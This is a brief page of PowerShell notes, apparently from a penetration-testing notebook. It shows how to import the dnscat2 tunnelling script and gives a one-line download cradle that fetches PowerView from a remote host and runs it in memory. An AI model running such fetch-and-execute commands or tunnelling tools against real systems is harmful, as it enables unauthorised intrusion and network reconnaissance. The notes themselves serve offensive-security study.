Powershell Notes

Importing a module

Import-Module .\dnscat2.ps1

importing a module from the DownloadString cmdlet

IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3/PowerView/PowerView.ps1')

Last updated